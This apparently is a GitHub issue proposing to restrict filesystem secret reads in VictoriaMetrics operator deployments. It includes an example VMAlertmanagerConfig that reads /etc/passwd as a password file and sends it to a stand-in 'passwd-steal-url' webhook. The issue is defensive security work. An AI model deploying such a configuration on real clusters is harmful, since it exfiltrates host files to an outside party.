Security improvements for filesystem access.

[f41gh7]

trafficstars

Currently, VictoriaMetrics components supports secrets reading from on-disk filesystem. It improves security for general case, when service owner doesn't share access to it with other users.

In case, of operator based deployments, when scrapping and alerting configuration delegated to the users. It could be an issue.

For instance, vmalertmanagerconfig may have a following configuration:

kind VMAlertmanagerConfig
spec:
  receivers:
  - name: webhook-read-passwd
    url: http://passwd-steal-url
    http_config:
      basic_auth:
        password_file: /etc/passwd

We could extend the following configuration param https://docs.victoriametrics.com/operator/api/#arbitraryfsaccessthroughsmsconfig to the other components, that using filesystem secrets.